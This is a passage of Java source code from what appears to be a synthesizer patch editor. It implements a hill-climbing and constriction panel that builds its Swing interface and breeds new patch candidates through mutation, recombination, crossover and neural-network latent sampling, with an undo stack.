bigger.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { setBigger(bigger.isSelected()); } }); boolean bb = false; if (s != null) try { bb = (s.equals("true")); } catch (Exception e) { Synth.handleException(e); } bigger.setSelected(bb); eb.addLast(bigger); panel.add(eb, BorderLayout.NORTH); toprow.add(panel); panel = new Category(null, "Archive", Style.COLOR_A()); HBox hbox = new HBox(); panel.add(hbox); for(int i = 0; i < ARCHIVE_SIZE; i++) { vbox = buildCandidate(NUM_CANDIDATES + i); hbox.add(vbox); } panel.add(hbox); toprow.addLast(panel); top.add(toprow); // Add Candidates panel = new Category(null, "Candidates", Style.COLOR_B()); hbox = new HBox(); candidates = new VBox(); for(int i = 0; i < NUM_CANDIDATES; i++) { vbox = buildCandidate(i); hbox.add(vbox); if (i % 8 == 7) { VBox vv = new VBox(); if (i != 7) vv.add(Strut.makeVerticalStrut(20)); vv.add(hbox); hbox = new HBox(); if (i == 23) extraCandidates1 = vv; else if (i == 31) extraCandidates2 = vv; else candidates.add(vv); } } panel.add(candidates, BorderLayout.WEST); HBox hb = new HBox(); hb.add(panel); VBox currentAndNone = new VBox(); // Add Current panel = new Category(null, "Current", Style.COLOR_C()); vbox = buildCandidate(NUM_MODELS - 1); HBox currentHBox = new HBox(); currentHBox.add(vbox); panel.add(currentHBox); currentAndNone.add(panel); // Add None panel = new Category(null, "None", Style.COLOR_C()); vbox = new VBox(); Box b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][0] = new JRadioButton("1")); ratings[NUM_MODELS][0].setFocusable(false); ratings[NUM_MODELS][0].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][0].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][0].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][0].setOpaque(false); // for windows 
b.add(Box.createGlue()); vbox.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][1] = new JRadioButton("2")); ratings[NUM_MODELS][1].setFocusable(false); ratings[NUM_MODELS][1].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][1].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][1].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][1].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][2] = new JRadioButton("3")); ratings[NUM_MODELS][2].setFocusable(false); ratings[NUM_MODELS][2].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][2].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][2].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][2].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); VBox bar = new VBox(); bar.addBottom(vbox); HBox foo = new HBox(); foo.add(bar); foo.add(Strut.makeHorizontalStrut(40)); panel.add(foo); currentAndNone.add(panel); hb.addLast(currentAndNone); top.add(hb); for(int i = 0; i < ratings.length; i++) { one.add(ratings[i][0]); two.add(ratings[i][1]); three.add(ratings[i][2]); } for(int i = NUM_CANDIDATES; i < NUM_CANDIDATES + ARCHIVE_SIZE; i++) { currentModels[i] = (Model)(synth.getModel().clone()); } currentModels[NUM_CANDIDATES + ARCHIVE_SIZE] = synth.getModel(); setMethod(method.getSelectedIndex()); setBigger(bb); } public void setBigger(boolean bigger) { candidates.remove(extraCandidates1); candidates.remove(extraCandidates2); if (bigger) { candidates.add(extraCandidates1); candidates.add(extraCandidates2); } candidates.revalidate(); candidates.repaint(); synth.setLastX("" + bigger, "HillClimbBigger", synth.getClass().getName()); } public static final int UPDATE_SOUND_RATE = 1; int updateSoundTick = 0; Model backup = null; boolean isShowingPane() { return (synth.hillClimbPane != null && synth.tabs.getSelectedComponent() == synth.hillClimbPane); } public void updateSound() { updateSoundTick++; if (updateSoundTick >= UPDATE_SOUND_RATE) updateSoundTick = 0; if (updateSoundTick == 0) { if (isShowingPane()) { for(int i = 0; i < NUM_MODELS; i++) { plays[i].getButton().setForeground(new JButton().getForeground()); plays[i].getButton().setText(titleForButton(i)); } if (temporaryPlay >= 0) { plays[temporaryPlay].getButton().setForeground(Color.RED); plays[temporaryPlay].getButton().setText("<HTML><B>" + titleForButton(temporaryPlay) + "</b></HTML>"); backup = synth.model; synth.model = currentModels[temporaryPlay]; synth.sendAllParameters(); temporaryPlay = -1; } else { currentPlay++; if (currentPlay >= NUM_CANDIDATES || currentPlay >= 16 && !bigger.isSelected()) currentPlay = 0; plays[currentPlay].getButton().setForeground(Color.RED); plays[currentPlay].getButton().setText("<HTML><B>" + titleForButton(currentPlay) + "</b></HTML>"); // change the model, send all parameters, maybe play a note, // and then restore the model. 
backup = synth.model; synth.model = currentModels[currentPlay]; synth.sendAllParameters(); } } } } void setMethod(int method) { boolean c = (method == 0 || method == 2); climb.getButton().setEnabled(c); constrict.getButton().setEnabled(!c); for(int i = 0; i < ratings.length; i++) for(int j = 0; j < ratings[i].length; j++) if (ratings[i][j] != null) ratings[i][j].setEnabled(c); for(int i = 0; i < selected.length; i++) if (selected[i] != null) selected[i].setEnabled(!c); hillClimbRate.setEnabled(c); constrictRate.setEnabled(!c); this.method.setSelectedIndex(method); outerBox.removeAll(); if (method == 0 || method == 2) { outerBox.add(hillClimbBox); } else { outerBox.add(constrictBox); } outerBox.revalidate(); repaint(); } int lastPlayedSound() { if (temporaryPlay >=0) return temporaryPlay; else return currentPlay; } public void postUpdateSound() { repaint(); if (backup != null) synth.model = backup; backup = null; } boolean startedUp = false; public void startup() { if (!startedUp) { resetCurrentPlay(); if (!synth.isSendingTestNotes() && synth.morphTestNotes) { synth.doSendTestNotes(); } } startedUp = true; } public void shutdown() { if (startedUp) { synth.doSendAllSoundsOff(false); if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); } if (synth.isRepeatingCurrentPatch()) { synth.doRepeatCurrentPatch(); } // restore patch synth.sendAllParameters(); } startedUp = false; } public void resetCurrentPlay() { currentPlay = NUM_CANDIDATES - 1; temporaryPlay = -1; } Model copy(Model model) { if (model != null) return model.copy(); else return null; } void again() { if (stackEmpty()) { // uh oh... System.err.println("Warning (HillClimb): " + "Empty Stack"); return; } else if (operation == OPERATION_SEED_FROM_PATCH) { initialize(synth.getModel(), operation); } else if (operation == OPERATION_SEED_FROM_NUDGE || operation == OPERATION_SEED_FROM_FOUR || operation == OPERATION_SEED_FROM_SIX) { initialize(null, operation); } else if (operation == OPERATION_CLIMB) { /* // reset ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); climb(); } else if (operation == OPERATION_CONSTRICT) { /* State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) ratings[state.parentIndices[j]][j].setSelected(true); } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); constrict(); } else if (operation == OPERATION_CLIMB_NN) { /* // reset ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) 
{ selected[j].setSelected(state.parentsSelected[j]); } */ pop(); climbNN(); } } void pop() { if (stackEmpty()) { // uh oh... System.err.println("Warning (HillClimb) 2: " + "Empty Stack"); return; } else if (stackInitial()) { // do nothing ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); } else { ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); operation = state.operation; System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { //System.err.println("Setting " + state.parentIndices[j] + " to " + j); ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } iterations.setName("Iteration " + stack.size()); repaint(); } } public void startHillClimbing() { for(int i = NUM_CANDIDATES; i < NUM_CANDIDATES + ARCHIVE_SIZE; i++) { currentModels[i] = (Model)(synth.getModel().clone()); } currentModels[NUM_CANDIDATES + ARCHIVE_SIZE] = synth.getModel(); if (method.getSelectedIndex() == 2) { //System.out.println(method.getSelectedIndex()); Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end produceNN(random, keys, weight, synth.getModel()); } else { initialize(synth.getModel(), OPERATION_SEED_FROM_PATCH); } } boolean[] getSelectedResults() { boolean[] sel = new boolean[NUM_CANDIDATES]; for(int i = 0; i < sel.length; i++) { sel[i] = selected[i].isSelected(); } return sel; } void initialize(Model seed, int operation) { // we need a model with NO callbacks stack.clear(); this.operation = operation; Random random = synth.random; String[] keys = synth.getMutationKeys(); switch(operation) { case OPERATION_SEED_FROM_PATCH: // Fall Thru case OPERATION_SEED_FROM_MORPH: { Model newSeed = seed.copy(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end int numMutations = 1; for(int i = 0; i < NUM_CANDIDATES; i++) { currentModels[i] = newSeed.copy(); for(int j = 0; j < numMutations; j++) currentModels[i] = currentModels[i].mutate(random, keys, weight); if (i % 4 == 3) numMutations++; } for(int i = 0; i < selected.length; i++) selected[i].setSelected(true); } break; case OPERATION_SEED_FROM_NUDGE: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; for(int i = 0; i < 4; i++) currentModels[i] = (Model)(synth.nudge[i].clone()); int m = 4; for(int i = 0; i < 4; i++) for(int j = 0; j < 4; j++) { if (j == i) continue; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } // fill the next 16 for(int i = 16; i < 32; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(16); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(16); if (p2 != p1) break; } currentModels[i] = currentModels[p1].copy().crossover(random, currentModels[p1], keys, weight); } } break; case OPERATION_SEED_FROM_FOUR: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int m = 4; for(int i = 0; i < 4; i++) for(int j = 0; j < 4; j++) { if (j == i) continue; currentModels[m++] = 
currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } // fill the next 16 for(int i = 16; i < 32; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(16); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(16); if (p2 != p1) break; } currentModels[i] = currentModels[p1].copy().crossover(random, currentModels[p1], keys, weight); } } break; case OPERATION_SEED_FROM_SIX: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int m = 6; for(int i = 0; i < 6; i++) for(int j = 0; j < 6; j++) { if (j == i) continue; if (m >= 32) break; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } } break; case OPERATION_SEED_FROM_LIBRARIAN: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int column = synth.librarian.getCurrentColumn(); int row = synth.librarian.getCurrentRow(); int len = synth.librarian.getCurrentLength(); if (len == 0) return; for(int i = 0; i < Math.min(len, 32); i++) { currentModels[i] = (Model)(synth.librarian.getModel(row + i, column).clone()); } int m = len; for(int i = 0; i < 6; i++) for(int j = 0; j < 6; j++) { if (j == i) continue; if (m >= 32) break; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } } break; } pushStack(new int[] {-1, -1, -1}, new Model[] { seed, null, null }, getSelectedResults(), currentModels); iterations.setName("Iteration " + stack.size()); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); repaint(); } void shuffle(Random random, Model[] array, int start, int len) { for (int i = len - 1; i > 0; i--) { int index = random.nextInt(i + 1); Model temp = array[start + index]; array[start + index] = array[start + i]; array[start + i] = temp; } } void produceNN(Random random, String[] keys, double weight, Model a) { if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } for(int i = 0; i < NUM_CANDIDATES; i++) { // A currentModels[i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } shuffle(random, currentModels, 0, NUM_CANDIDATES); } void produceNN(Random random, String[] keys, double weight, Model a, Model b) { int numStages = NUM_CANDIDATES / STAGE_SIZE; if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } if(b.latentVector == null) { b.latentVector = ((ProvidesNN)synth).encode(b); } for(int j = 0; j < numStages; j++) { for(int i = 0; i < STAGE_SIZE/2; i++) { // A currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } for(int i = STAGE_SIZE/2; i < 3*STAGE_SIZE/4; i++) { // B currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } for(int i = 3*STAGE_SIZE/4; i < STAGE_SIZE; i++) { // C currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); } } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produceNN(Random random, String[] keys, double weight, Model a, Model b, Model c) { int numStages = NUM_CANDIDATES / STAGE_SIZE; if(a.latentVector == null) { a.latentVector = 
((ProvidesNN)synth).encode(a); } if(b.latentVector == null) { b.latentVector = ((ProvidesNN)synth).encode(b); } if(c.latentVector == null) { c.latentVector = ((ProvidesNN)synth).encode(c); } for(int j = 0; j < numStages; j++) { // A currentModels[j*STAGE_SIZE + 0] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 1] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 2] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 3] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // B currentModels[j*STAGE_SIZE + 4] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 5] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 6] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // C currentModels[j*STAGE_SIZE + 7] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(c.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 8] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(c.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A, B) currentModels[j*STAGE_SIZE + 9] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 10] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A, C) currentModels[j*STAGE_SIZE + 11] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 12] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(B, C) currentModels[j*STAGE_SIZE + 13] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 14] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A,B,C) currentModels[j*STAGE_SIZE + 15] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } public static final double MUTATION_WEIGHT = 1.0; void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model c, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, b, c, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random 
random, String[] keys, double recombination, double weight, Model a, Model b, Model c, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A + B currentModels[stage + 0] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight); // A + C currentModels[stage + 1] = a.copy().recombine(random, c, keys, recombination).mutate(random, keys, mutationWeight); // A + (B + C) currentModels[stage + 2] = a.copy().recombine(random, b.copy().recombine(random, c, keys, recombination), keys, recombination).mutate(random, keys, mutationWeight); // A - B currentModels[stage + 3] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - C currentModels[stage + 4] = a.copy().opposite(random, c, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A currentModels[stage + 5] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B currentModels[stage + 6] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C currentModels[stage + 7] = c.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { // A - Z currentModels[stage + 8] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // B - A currentModels[stage + 9] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C - A currentModels[stage + 10] = c.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - C currentModels[stage + 11] = b.copy().opposite(random, c, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C - B currentModels[stage + 12] = c.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - Z currentModels[stage + 13] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // C - Z currentModels[stage + 14] = c.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // B + C currentModels[stage + 15] = b.copy().recombine(random, c, keys, recombination).mutate(random, keys, mutationWeight); } } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, b, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A + B currentModels[stage + 0] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight); currentModels[stage + 1] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 2] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight).mutate(random, keys, 
mutationWeight).mutate(random, keys, mutationWeight); // A - B currentModels[stage + 3] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 4] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - A currentModels[stage + 5] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 6] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - Z currentModels[stage + 7] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { currentModels[stage + 8] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - Z currentModels[stage + 9] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); currentModels[stage + 10] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // (A - Z) + (B - Z) currentModels[stage + 11] = a.copy().opposite(random, oldA, keys, recombination, false).recombine(random, b.copy().opposite(random, oldA, keys, recombination, false), keys, recombination).mutate(random, keys, mutationWeight); // A currentModels[stage + 12] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 13] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B currentModels[stage + 14] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 15] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); } } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A currentModels[stage + 0] = a.copy().mutate(random, keys, mutationWeight); currentModels[stage + 1] = a.copy().mutate(random, keys, mutationWeight); currentModels[stage + 2] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 3] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 4] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 5] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 6] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 7] = a.copy().mutate(random, keys, 
mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { currentModels[stage + 8] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 9] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 10] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 11] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 12] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - Z currentModels[stage + 13] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); currentModels[stage + 14] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 15] = a.copy().opposite(random, oldA, keys, recombination, false).opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); } } void constrict() { int poolSize= (bigger.isSelected() ? NUM_CANDIDATES : STAGE_SIZE); // that is, 32 vs 16 Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("constrictrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end // Identify the individuals to replace and the ones to keep int numToReplace = 0; for(int i = 0; i < selected.length; i++) { if (!selected[i].isSelected()) numToReplace++; } int[] replace = new int[numToReplace]; int[] keep = new int[poolSize - numToReplace]; if (replace.length == 0 || keep.length == 0) return; int k = 0; int r = 0; for(int i = 0; i < poolSize; i++) { if (selected[i].isSelected()) keep[k++] = i; else replace[r++] = i; } pushStack(new int[] { -1, -1, -1 }, new Model[] { currentModels[NUM_CANDIDATES - 1], null, null }, getSelectedResults(), currentModels); operation = OPERATION_CONSTRICT; // Now replace the individuals for(int i = 0; i < replace.length; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(keep.length); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(keep.length); if (p2 != p1) break; } if (method.getSelectedIndex() == 1) { // our recombination works as follows: 50% of the time we'll do crossover with a 1/2 rate. Otherwise we'll do it with a 3/4 rate. 
double rate = CONSTRICT_RECOMBINATION_RATE; // recombine if (random.nextBoolean()) rate = 0.5; currentModels[replace[i]] = currentModels[keep[p1]].copy().recombine(random, currentModels[keep[p2]], keys, rate).mutate(random, keys, weight); } } // Move the new ones to the beginning Model[] old = (Model[])(currentModels.clone()); int count = 0; for(int i = 0; i < replace.length; i++) { currentModels[count++] = old[replace[i]]; } for(int i = 0; i < keep.length; i++) { currentModels[count++] = old[keep[i]]; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } void climb() { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end currentModels[NUM_MODELS - 1] = synth.getModel(); // What were the best models before? int[] bestModels = new int[3]; for(int j = 0; j < 3; j++) bestModels[j] = -1; // load the best models for(int i = 0; i < NUM_MODELS; i++) { for(int j = 0; j < 3; j++) { if (ratings[i][j].isSelected()) bestModels[j] = i; } } // Compact if (bestModels[1] == -1) { bestModels[1] = bestModels[2]; bestModels[2] = -1; } if (bestModels[0] == -1) { bestModels[0] = bestModels[1]; bestModels[1] = bestModels[2]; bestModels[2] = -1; } Model oldA = topStack().parents[0]; if (bestModels[0] == -1) { again(); // nothing was selected as good, so we just do a retry } else if (bestModels[1] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], null, null }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], oldA); operation = OPERATION_CLIMB; } else if (bestModels[2] == -1) { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], null }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], oldA); operation = OPERATION_CLIMB; } else { pushStack(bestModels, new Model[] { currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]] }, getSelectedResults(), currentModels); produce(random, keys, CLIMB_RECOMBINATION_RATE, weight, currentModels[bestModels[0]], currentModels[bestModels[1]], currentModels[bestModels[2]], oldA); operation = OPERATION_CLIMB; } iterations.setName("Iteration " + stack.size()); repaint(); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int i = 0; i < NUM_CANDIDATES; i++) selected[i].setSelected(true); } void climbNN() { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 